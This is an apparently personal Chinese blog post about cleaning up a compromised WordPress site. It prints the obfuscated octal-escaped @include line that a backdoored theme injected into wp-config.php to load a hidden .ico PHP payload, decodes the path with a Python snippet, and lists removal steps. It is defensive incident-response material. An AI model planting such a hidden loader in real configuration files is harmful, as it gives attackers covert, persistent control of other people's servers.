问题:FTP登录站点发现根目录下面有很多随机命名的文件夹,里面还有很多PHP文件,有时候站点访问也很慢。
想想原因,应该是在某宝买的X3主题有后门,网站被入侵了,同时也发现了被入侵的痕迹,暂时先不谈。
即使删掉了这些文件,后期又会自动生成,那么是为什么导致目录产生了这些文件夹呢。
后来发现,在wp-config.php配置文件里面多了下面这些代码:
@include "\057ww\167ro\157t/\167p-\151nc\154ud\145s/\123im\160le\120ie\057Pa\162se\057.7\14575\0602b\142.i\143o";
这是什么东西,遇到了知识盲区,后来找到了方法可以用python转换一下:
#!/usr/bin/env python3
s = "\057ww\167ro\157t/\167p-\151nc\154ud\145s/\123im\160le\120ie\057Pa\162se\057.7\14575\0602b\142.i\143o"
l = list()
for i in range(0, len(s), 4):
l.extend([str(s[i]), s[i+1:i+4]]) # /var
path = ''.join(l)
print(path)
# /wwwroot/wp-includes/SimplePie/Parse/.xxxxxx.ico 就是这个目录里面的一个.ico
用记事本打开这个ico文件,里面也都是一堆加密的代码,应该就是生成这些垃圾文件的。
现在问题清晰了,运行wp-config.php,就会加载上述PHP文件(@include .xxxxxxx.ico),并运行该PHP,产生一堆随机文件。
解决办法:删除文件xxxxx.ico,删除wp-config.php中多出来的代码,并移除wp-config.php组的写权限。最后就是修复网站漏洞,防止被入侵。